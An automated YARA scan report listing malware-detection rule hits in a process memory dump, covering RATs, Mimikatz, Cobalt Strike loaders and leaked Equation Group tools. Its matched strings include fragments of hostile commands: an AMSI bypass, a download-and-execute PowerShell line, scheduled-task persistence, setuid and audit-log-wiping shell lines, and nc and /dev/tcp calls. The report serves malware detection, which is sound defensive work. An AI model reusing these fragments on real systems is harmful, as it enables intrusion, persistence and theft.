0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Pupy_Backdoor	Detects Pupy backdoor	Florian Roth	0xa025:$x1: reflectively inject a dll into a process. 0xa053:$x2: ld_preload_inject_dll(cmdline, dll_buffer, hook_exit) -> pid 0xa094:$x3: LD_PRELOAD=%s HOOK_EXIT=%d CLEANUP=%d exec %s 1>/dev/null 2>/dev/null 0xa0de:$x4: reflective_inject_dll 0xa15f:$x4: reflective_inject_dll 0xa179:$x4: reflective_inject_dll 0x3b8f8:$x4: reflective_inject_dll 0xa053:$x5: ld_preload_inject_dll 0xa0f8:$x5: ld_preload_inject_dll 0xa112:$x6: get_pupy_config() -> string 0xa132:$x7: [INJECT] inject_dll. OpenProcess failed. 0xa0de:$x8: reflective_inject_dll 0xa15f:$x8: reflective_inject_dll 0xa179:$x8: reflective_inject_dll 0x3b8f8:$x8: reflective_inject_dll 0xa179:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits) 0xa1bc:$x10: linux_inject_main
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Microcin_Sample_5	Malware sample mentioned in Microcin technical report by Kaspersky	Florian Roth	0x4fc6:$x1: Sorry, you are not fortuante ^_^, Please try other password dictionary 0x5012:$x2: DomCrack <IP> <UserName> <Password_Dic file path> <option> 0x5051:$x3: The password is "%s" Time: %d(s) 0x507e:$x4: The password is " %s " Time: %d(s) 0x50ad:$x5: No password found! 0x50c4:$x7: Can not found the Password Dictoonary file!
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	clearlog	Detects Fireball malware - file clearlog.dll	Florian Roth	0x193c5:$x1: \ClearLog\Release\logC.pdb 0x1940a:$s2: logC.dll 0x19433:$s5: Logger Name:
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	PS_AMSI_Bypass	Detects PowerShell AMSI Bypass	Florian Roth	0xf1b4:$s1: .GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	JS_Suspicious_Obfuscation_Dropbox	Detects PowerShell AMSI Bypass	Florian Roth	0xf37f:$x1: j"+"a"+"v"+"a"+"s"+"c"+"r"+"i"+"p"+"t" 0xf3aa:$x2: script:https://www.dropbox.com
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	JS_Suspicious_MSHTA_Bypass	Detects MSHTA Bypass	Florian Roth	0x7d9e:$s1: mshtml,RunHTMLApplication 0xf523:$s1: mshtml,RunHTMLApplication 0xf541:$s2: new ActiveXObject("WScript.Shell").Run( 0xf56d:$s3: /c start mshta j
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	JavaScript_Run_Suspicious	Detects a suspicious Javascript Run command	Florian Roth	0x8dc6:$s1: w = new ActiveXObject( 0x8de1:$s2: w.Run(r);
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	FVEY_ShadowBroker_Auct_Dez16_Strings	String from the ShodowBroker Files Screenshots - Dec 2016	Florian Roth	0x2cefa:$s2: Auditcleaner 0x2cf61:$s2: Auditcleaner 0x32706:$s11: elatedmonkey 0x3277a:$s11: elatedmonkey 0x2d510:$s17: ys.ratload.sh 0x2bc65:$elf4: charm_saver 0x2f4b5:$elf8: ebbshave 0x2f51d:$elf8: ebbshave 0x2f753:$elf9: eggbasket 0x2f7bc:$elf9: eggbasket 0x319d4:$elf12: envoytomato 0x31a3a:$elf12: envoytomato 0x317bf:$elf14: estopmoonlit 0x31826:$elf14: estopmoonlit 0x33021:$elf17: ghost_sparc 0x3309e:$elf17: ghost_sparc 0x30db6:$elf18: jackpop 0x30e1d:$elf18: jackpop 0x2a85c:$elf19: orleans_stride 0x2ade8:$elf21: seconddate 0x2bc65:$pe2: charm_saver
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Ysoserial_Payload_Spring1	Ysoserial Payloads - file Spring1.bin	Florian Roth	0x3e9db:$x1: ysoserial/Pwner
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Ysoserial_Payload	Ysoserial Payloads	Florian Roth	0x3eb30:$x1: ysoserial/payloads/ 0x3eb48:$s1: StubTransletPayload 0x3eb60:$s2: Pwnrpw
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Ysoserial_Payload_3	Ysoserial Payloads - from files JavassistWeld1.bin, JBossInterceptors.bin	Florian Roth	0x3ece5:$x1: ysoserialq 0x3ecf4:$s1: targetClassInterceptorMetadatat 0x3ed18:$s2: targetInstancet 0x3ed2c:$s3: targetClassL 0x3ed3d:$s4: POST_ACTIVATEsr 0x3ed51:$s5: PRE_DESTROYsq
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	CACTUSTORCH	Detects CactusTorch Hacktool	Florian Roth	0xc7e4:$x1: $payload = shellcode(%options["listener"], "true", "x86"); 0xc823:$x2: Copy the base64 encoded payload into the code variable below. 0xc886:$x4: ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3) 0xc8e6:$x5: ' Author: Vincent Yiu (@vysecurity) 0xc90e:$x6: Dim binary : binary = "rundll32.exe" 0xc937:$a1: code = code & " 0xc94b:$a2: serialized_obj = serialized_obj & " 0xc91b:$s1: binary = "rundll32.exe" 0xc973:$s1: binary = "rundll32.exe" 0xc9e4:$s1: binary = "rundll32.exe" 0xc98f:$s2: EL.DataType = "bin.hex" 0xc9ab:$s3: Set stm = CreateObject("System.IO.MemoryStream") 0xc9e0:$s4: var binary = "rundll32.exe"; 0xca01:$s5: var serialized_obj = "
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x3405e:$s1: DoUploadAndExecute 0x34075:$s2: DoDownloadAndExecute 0x3408e:$s3: DoShellExecute 0x340a1:$s4: set_Processname 0x340b6:$op1: 04 1E FE 02 04 16 FE 01 60 0x340c5:$op2: 00 17 03 1F 20 17 19 15 28 0x340d4:$op3: 00 04 03 69 91 1B 40
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x34226:$x1: GetKeyloggerLogsResponse 0x34243:$x2: get_Keylogger 0x34255:$x3: HandleGetKeyloggerLogsResponse 0x34278:$s1: DoShellExecuteResponse 0x34293:$s2: GetPasswordsResponse 0x342ac:$s3: GetStartupItemsResponse 0x342c8:$s4: <GetGenReader>b__7 0x342df:$s5: RunHidden
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	OpCloudHopper_Malware_2	Detects malware from Operation Cloud Hopper	Florian Roth	0x370d2:$x1: sERvEr.Dll 0x370f2:$x3: .?AVCKeyLoggerManager@@ 0x3710e:$x4: GH0STCZH 0x37177:$s3: \Release\Loader.pdb 0x371fe:$op1: 8D 34 17 8D 49 00 8A 14 0E 3A 14 29 75 05 41 3B 0x37214:$op2: 83 E8 14 78 CF C1 E0 06 8B F8 8B C3 8A 08 84 C9 0x3722a:$op3: 3B FB 7D 3F 8A 4D 14 8D 45 14 84 C9 74 1B 8A 14
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	OpCloudHopper_Malware_3	Detects malware from Operation Cloud Hopper	Florian Roth	0x373c1:$s6: operator "" 0x377c8:$s6: operator "" 0x37f98:$s6: operator "" 0x36ef4:$s7: zok]\\\ZZYYY666564444 0x373d2:$s7: zok]\\\ZZYYY666564444 0x37fcb:$s7: zok]\\\ZZYYY666564444 0x3b2df:$s7: zok]\\\ZZYYY666564444 0x373ed:$s11: InvokeMainViaCRT 0x377d9:$s11: InvokeMainViaCRT 0x37403:$s12: .?AVAES@@ 0x377ef:$s12: .?AVAES@@ 0x37412:$op1: B6 4C 06 F5 32 CF 88 4C 06 05 0F B6 4C 06 F9 32 0x37428:$op2: 06 FC EB 03 8A 5E F0 85 C0 74 05 8A 0C 06 EB 03 0x3743e:$op3: 7E F8 85 C0 74 06 8A 74 06 08 EB 03 8A 76 FC 85
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	OpCloudHopper_Malware_5	Detects malware from Operation Cloud Hopper	Florian Roth	0x3797f:$x1: CWINDOWSSYSTEMROOT 0x37996:$x2: YJ_D_KROPOX_M_NUJI_OLY_S_JU_MOOK 0x379bb:$x3: NJK_JK_SED_PNJHGFUUGIOO_PIY 0x379db:$x4: c_VDGQBUl}YSB_C_VDlqSDYFU 0x379f9:$s7: FALLINLOVE 0x37a09:$op1: 83 EC 60 8D 4C 24 00 E8 6F FF FF FF 8D 4C 24 00
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	OpCloudHopper_WmiDLL_inMemory	Malware related to Operation Cloud Hopper - Page 25	Florian Roth	0x35ac9:$s1: wmi.dll 2>&1
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	VBS_WMIExec_Tool_Apr17_1	Tools related to Operation Cloud Hopper	Florian Roth	0x36bb9:$x1: strNetUse = "cmd.exe /c net use \\" & host 0x36be8:$x2: localcmd = "cmd.exe /c " & command 0x36c10:$x3: & " > " & TempFile & " 2>&1" '2>&1 err 0x36c3c:$x4: strExec = "cmd.exe /c " & cmd & " >> " & resultfile & " 2>&1" '2>&1 err 0x36c89:$x5: TempFile = objShell.ExpandEnvironmentStrings("%TEMP%") & "\wmi.dll" 0x36cd1:$a1: WMIEXEC ERROR: Command -> 0x36cf0:$a2: WMIEXEC : Command result will output to 0x36d1c:$a3: WMIEXEC : Target -> 0x36d34:$a4: WMIEXEC : Login -> OK 0x36d4e:$a5: WMIEXEC : Process created. PID:
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	RevengeRAT_Sep17	Detects RevengeRAT malware	Florian Roth	0x78a4:$x1: Nuclear Explosion.g.resources 0x78f3:$x4: 5B1EE7CAD3DFF220A95D1D6B91435D9E1520AC41 0x7920:$x5: \RevengeRAT\ 0x7931:$x6: Revenge-RAT client has been successfully installed. 0x7969:$x7: Nuclear Explosion.exe
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Mimipenguin_SH	Detects Mimipenguin Password Extractor - Linux	Florian Roth	0x38676:$s1: $(echo $thishash \| cut -d'$' -f 3) 0x3869d:$s2: ps -eo pid,command \| sed -rn '/gnome\-keyring\-daemon/p' \| awk 0x386e0:$s3: MimiPenguin Results:
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	POSHSPY_Malware	Detects	Florian Roth	0xfb6e:$x1: function sWP($cN, $pN, $aK, $aI) 0xfb93:$x2: $aeK = [byte[]] (0x69, 0x87, 0x0b, 0xf2 0xfbbf:$x3: (('variant', 'excretions', 'accumulators', 'winslow', 'whistleable', 'len', 0xfc0f:$x4: $cPairKey = "BwIAAACkAABSU0EyAAQAAAEAA 0xfc3a:$x5: $exeRes = exePldRoutine 0xfc56:$x6: ZgB1AG4AYwB0AGkAbwBuACAAcAB1AHIAZgBDAHIA
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Invoke_Mimikatz	Detects Invoke-Mimikatz String	Florian Roth	0xf6e3:$x2: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm 0xf75a:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	FIN7_Backdoor_Aug17	Detects Word Dropper from Proofpoint FIN7 Report	Florian Roth	0xb6f9:$x1: wscript.exe //b /e:jscript C:\Users\ 0xb722:$x2: wscript.exe /b /e:jscript C:\Users\ 0xb74a:$x3: schtasks /Create /f /tn "GoogleUpdateTaskMachineSystem" /tr "wscript.exe 0xb797:$x4: schtasks /Delete /F /TN ""GoogleUpdateTaskMachineCore 0xb7d1:$x5: schtasks /Delete /F /TN "GoogleUpdateTaskMachineCore 0xb80a:$x6: wscript.exe //b /e:jscript %TMP%\debug.txt 0xb839:$s1: /?page=wait 0xb849:$a1: autoit3.exe 0xb859:$a2: dumpcap.exe 0xb869:$a3: tshark.exe 0xb878:$a4: prl_cc.exe 0xb887:$v1: vmware 0xb892:$v2: PCI\\VEN_80EE&DEV_CAFE 0xb8ad:$v3: VMWVMCIHOSTDEV 0xb8c0:$c1: apowershell 0xb8d0:$c2: wpowershell 0xb8e0:$c3: get_passwords 0xb8f2:$c4: kill_process 0xb903:$c5: get_screen
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	PUA_CryptoMiner_Jan19_1	Detects Crypto Miner strings	Florian Roth	0x15b04:$s2: -t, --threads=N number of miner threads (default: number of processors)
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Invoke_SMBExec	Detects Invoke-WmiExec or Invoke-SmbExec	Florian Roth	0x1644d:$x1: Invoke-SMBExec -Target 0x16468:$x2: $packet_SMB_header = Get-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $process_ID_bytes $SMB_user_ID 0x164d5:$s1: Write-Output "Command executed with service $SMB_service on $Target" 0x1651e:$s2: $packet_RPC_data = Get-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00 0x16581:$s3: $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Invoke_WMIExec_Gen_1	Detects Invoke-WmiExec or Invoke-SmbExec	Florian Roth	0x16739:$x1: Invoke-WMIExec 0x1674d:$x2: $target_count = [System.math]::Pow(2,(($target_address.GetAddressBytes().Length * 8) - $subnet_mask_split)) 0x167bd:$s1: Import-Module $PWD\Invoke-TheHash.ps1 0x167e7:$s2: Import-Module $PWD\Invoke-SMBClient.ps1 0x16813:$s3: $target_address_list = [System.Net.Dns]::GetHostEntry($target_long).AddressList 0x16867:$x4: Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Invoke_SMBExec_Invoke_WMIExec_1	Auto-generated rule - from files Invoke-SMBExec.ps1, Invoke-WMIExec.ps1	Florian Roth	0x16a45:$s1: $process_ID = $process_ID -replace "-00-00","" 0x16a78:$s2: Write-Output "$Target did not respond" 0x16aa3:$s3: [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID)
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Invoke_WMIExec_Gen	Auto-generated rule - from files Invoke-SMBClient.ps1, Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, Invoke-WMIExec.ps1	Florian Roth	0x16c9e:$s1: $NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes) 0x16ce3:$s2: $client_challenge = [String](1..8 \| ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) 0x16d4e:$s3: $NTLM_hash_bytes = $NTLM_hash_bytes.Split("-") \| ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	WMImplant	Auto-generated rule - file WMImplant.ps1	Florian Roth	0x38c96:$x1: Invoke-ProcessPunisher -Creds $RemoteCredential 0x38cca:$x2: $Target -query "SELECT * FROM Win32_NTLogEvent WHERE (logfile='security') 0x38d35:$x4: -Download -RemoteFile C:\passwords.txt 0x38d60:$x5: -Command 'powershell.exe -command "Enable-PSRemoting 0x38d99:$x6: Invoke-WMImplant
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	FVEY_ShadowBrokers_Jan17_Screen_Strings	Detects strings derived from the ShadowBroker\'s leak of Windows tools/exploits	Florian Roth	0x2191f:$x3: PeddleCheap 0x2738b:$x3: PeddleCheap 0x1fe76:$d4: Mcl_NtMemory
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Invoke_OSiRis	Osiris Device Guard Bypass - file Invoke-OSiRis.ps1	Florian Roth	0x3882a:$x1: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create -Arg $ObfusK -Computer $Target 0x3874c:$x2: Invoke-OSiRis 0x3889d:$x2: Invoke-OSiRis 0x388af:$x3: -Arg@{Name=$VarName;VariableValue=$OSiRis;UserName=$env:Username} 0x388f5:$x4: Device Guard Bypass Command Execution 0x3891f:$x5: -Put Payload in Win32_OSRecoveryConfiguration DebugFilePath 0x3882a:$x6: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create 0x3895f:$x6: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	MAL_KHRAT_script	Rule derived from KHRAT script but can match on other malicious scripts as well	Florian Roth	0x7d16:$x1: CreateObject("WScript.Shell").Run "schtasks /create /sc MINUTE /tn 0x7d5d:$x2: CreateObject("WScript.Shell").Run "rundll32.exe javascript:""\..\mshtml,RunHTMLApplication 0x7dbc:$x3: <registration progid="ff010f" classid="{e934870c-b429-4d0d-acf1-eef338b92c4b}" >
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	WiltedTulip_powershell	Detects powershell script used in Operation Wilted Tulip	Florian Roth	0xd20b:$x1: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	WiltedTulip_Windows_UM_Task	Detects a Windows scheduled task as used in Operation Wilted Tulip	Florian Roth	0xda7c:$c1: svchost64.swp",checkUpdate 0xda9b:$c2: svchost64.swp,checkUpdate
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	WiltedTulip_WindowsTask	Detects hack tool used in Operation Wilted Tulip - Windows Tasks	Florian Roth	0xdc59:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0xe978:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x17ef3:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0xe9ae:$x2: %d is an x86 process (can't inject x64 content) 0x17f29:$x2: %d is an x86 process (can't inject x64 content) 0xe9e2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x17ea5:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0xea30:$x4: Failed to impersonate token from %d (%u) 0xea5d:$x5: Failed to impersonate logged on user %d (%u) 0xea8e:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x17f96:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Impacket_Tools_Generic_1	Compiled Impacket Tools	Florian Roth	0x368ab:$s1: bpywintypes27.dll 0x368c1:$s2: hZFtPC 0xba3c:$s3: impacket 0xba4e:$s3: impacket 0xba61:$s3: impacket 0x3437e:$s3: impacket 0x3444a:$s3: impacket 0x344e8:$s3: impacket 0x34645:$s3: impacket 0x34715:$s3: impacket 0x347ae:$s3: impacket 0x34906:$s3: impacket 0x34a82:$s3: impacket 0x34b47:$s3: impacket 0x34bf2:$s3: impacket 0x34cbb:$s3: impacket 0x34d59:$s3: impacket 0x34e11:$s3: impacket 0x34ebb:$s3: impacket 0x35021:$s3: impacket 0x350e4:$s3: impacket
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup_Auditcleaner	Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner	Florian Roth	0x2d06a:$x1: > /var/log/audit/audit.log; rm -f . 0x2d092:$x2: Pastables to run on target: 0x2d0b2:$x3: cp /var/log/audit/audit.log .tmp 0x2d0d7:$l1: Here is the first good cron session from 0x2d104:$l2: No need to clean LOGIN lines.
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup_elgingamble	Equation Group hack tool leaked by ShadowBrokers- file elgingamble	Florian Roth	0x2f213:$x1: * * * * * root chown root %s; chmod 4755 %s; %s 0x2f247:$x2: [-] kernel not vulnerable 0x3174a:$x2: [-] kernel not vulnerable 0x31958:$x2: [-] kernel not vulnerable 0x31b42:$x2: [-] kernel not vulnerable 0x2f265:$x3: [-] failed to spawn shell: %s 0x2f287:$x4: -s shell Use shell instead of %s
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup_cmsd	Equation Group hack tool leaked by ShadowBrokers- file cmsd	Florian Roth	0x2f42b:$x1: usage: %s address [-t][-s\|-c command] [-p port] [-v 5\|6\|7] 0x2f46a:$x2: error: not vulnerable 0x2f484:$s1: port=%d connected! 0x2f49c:$s2: xxx.XXXXXX
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup_ebbshave	Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5	Florian Roth	0x2f62b:$s1: executing ./ebbnew_linux -r %s -v %s -A %s %s -t %s -p %s 0x2f669:$s2: ./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772 0x2f6a7:$s3: version 1 - Start with option #18 first, if it fails then try this option 0x2f6f5:$s4: %s is a wrapper program for ebbnew_linux exploit for Sparc Solaris RPC services
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup_eggbasket	Equation Group hack tool leaked by ShadowBrokers- file eggbasket	Florian Roth	0x2f8c8:$x1: # Building Shellcode into exploit. 0x2f8ef:$x2: %s -w /index.html -v 3.5 -t 10 -c "/usr/openwin/bin/xterm -d 555.1.2.2:0&" -d 10.0.0.1 -p 80 0x2f951:$x3: # STARTING EXHAUSTIVE ATTACK AGAINST
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup_sambal	Equation Group hack tool leaked by ShadowBrokers- file sambal	Florian Roth	0x2fd16:$s1: + Bruteforce mode. 0x2fd2d:$s3: + Host is not running samba! 0x2fd4e:$s4: + connecting back to: [%d.%d.%d.%d:45295] 0x2fd7c:$s5: + Exploit failed, try -b to bruteforce. 0x2fda8:$s7: Usage: %s [-bBcCdfprsStv] [host]
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup_envisioncollision	Equation Group hack tool leaked by ShadowBrokers- file envisioncollision	Florian Roth	0x30168:$x1: mysql \$D --host=\$H --user=\$U --password=\"\$P\" -e \"select * from \$T 0x301b6:$x2: Window 3: $0 -Uadmin -Ppassword -i127.0.0.1 -Dipboard -c\"sleep 500\|nc 0x30201:$s3: $ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); 0x30247:$s4: $url = $host . "/admin/index.php?adsess=" . $enter . "&app=core&module=applications&section=hooks&do=install_hook";
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup_cmsex	Equation Group hack tool leaked by ShadowBrokers- file cmsex	Florian Roth	0x30436:$x1: Usage: %s -i <ip_addr/hostname> -c <command> -T <target_type> (-u <port> \| -t <port>) 0x30491:$x2: -i target ip address / hostname 0x304b6:$x3: Note: Choosing the correct target type is a bit of guesswork. 0x304f8:$x4: Solaris rpc.cmsd remote root exploit 0x30521:$x5: If one choice fails, you may want to try another.
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup_DUL	Equation Group hack tool leaked by ShadowBrokers- file DUL	Florian Roth	0x3086d:$x1: ?Usage: %s <shellcode> <output_file> 0x30896:$x2: Here is the decoder+(encoded-decoder)+payload
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup_slugger2	Equation Group hack tool leaked by ShadowBrokers- file slugger2	Florian Roth	0x30a45:$x1: usage: %s hostip port cmd [printer_name] 0x30a72:$x2: command must be less than 61 chars 0x30a99:$s1: __rw_read_waiting 0x306da:$s2: completed.1 0x30aaf:$s2: completed.1 0x30abf:$s3: __mutexkind 0x30acf:$s4: __rw_pshared
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup_jackpop	Equation Group hack tool leaked by ShadowBrokers- file jackpop	Florian Roth	0x30f27:$x1: %x:%d --> %x:%d %d bytes 0x30f45:$s1: client: can't bind to local address, are you root? 0x30f7c:$s2: Unable to register port 0x30f98:$s3: Could not resolve destination 0x30fba:$s4: raw troubles
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup_epoxyresin_v1_0_0	Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1	Florian Roth	0x2f247:$x1: [-] kernel not vulnerable 0x3174a:$x1: [-] kernel not vulnerable 0x31958:$x1: [-] kernel not vulnerable 0x31b42:$x1: [-] kernel not vulnerable 0x31768:$s1: .tmp.%d.XXXXXX 0x3177b:$s2: [-] couldn't create temp file 0x3179d:$s3: /boot/System.map-%s
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup_estesfox	Equation Group hack tool leaked by ShadowBrokers- file estesfox	Florian Roth	0x326c1:$x1: chown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cron
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup_elatedmonkey_1_0_1_1	Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh	Florian Roth	0x32894:$x3: Usage: $0 ( -s IP PORT \| CMD ) 0x328b7:$s5: os.execl("/bin/sh", "/bin/sh", "-c", "$CMD") 0x328e9:$s13: PHP_SCRIPT="$HOME/public_html/info$X.php" 0x32918:$s15: cat > /dev/tcp/127.0.0.1/80 <<END
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup__ftshell_ftshell_v3_10_3_0	Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7	Florian Roth	0x32ced:$s1: set uRemoteUploadCommand "[exec cat /current/.ourtn-ftshell-upcommand]" 0x32d39:$s2: send "\[ \"\$BASH\" = \"/bin/bash\" -o \"\$SHELL\" = \"/bin/bash\" \] && 0x32d86:$s3: system rm -f /current/tmp/ftshell.latest 0x32db3:$s4: # ftshell -- File Transfer Shell
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup__scanner_scanner_v2_1_2	Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2	Florian Roth	0x1fe16:$s1: Welcome to the network scanning tool 0x32f79:$s1: Welcome to the network scanning tool 0x32fa2:$s2: Scanning port %d 0x32fb7:$s3: /current/down/cmdout/scans 0x32fd6:$s4: Scan for SSH version 0x32fef:$s5: program vers proto port service
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup__ghost_sparc_ghost_x86_3	Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86	Florian Roth	0x331b7:$x1: Usage: %s [-v os] [-p] [-r] [-c command] [-a attacker] target 0x331f9:$x2: Sending shellcode as part of an open command... 0x3322d:$x3: cmdshellcode 0x3323e:$x4: You will not be able to run the shellcode. Exiting...
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup__jparsescan_parsescan_5	Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan	Florian Roth	0x3364e:$s1: # default is to dump out all scanned hosts found 0x33683:$s2: $bool .= " -r " if (/mibiisa.* -r/); 0x336ac:$s3: sadmind is available on two ports, this also works) 0x336e4:$s4: -x IP gives \"hostname:# users:load ...\" if positive xwin scan
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup__funnelout_v4_1_0_1	Equation Group hack tool leaked by ShadowBrokers- from files funnelout.v4.1.0.1.pl	Florian Roth	0x338c8:$s1: header("Set-Cookie: bbsessionhash=" . \$hash . "; path=/; HttpOnly"); 0x33912:$s2: if ($code =~ /proxyhost/) { 0x33932:$s3: \$rk[1] = \$rk[1] - 1; 0x3394d:$s4: #existsUser($u) or die "User '$u' does not exist in database.\n";
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup__magicjack_v1_1_0_0_client	Equation Group hack tool leaked by ShadowBrokers- from files magicjack_v1.1.0.0_client-1.1.0.0.py	Florian Roth	0x33b44:$s1: temp = ((left >> 1) ^ right) & 0x55555555 0x33b72:$s2: right ^= (temp << 16) & 0xffffffff 0x33b9a:$s3: tempresult = "" 0x33bae:$s4: num = self.bytes2long(data)
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup__ftshell	Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7	Florian Roth	0x33d63:$s1: if { [string length $uRemoteUploadCommand] 0x33d92:$s2: processUpload 0x33da4:$s3: global dothisreallyquiet
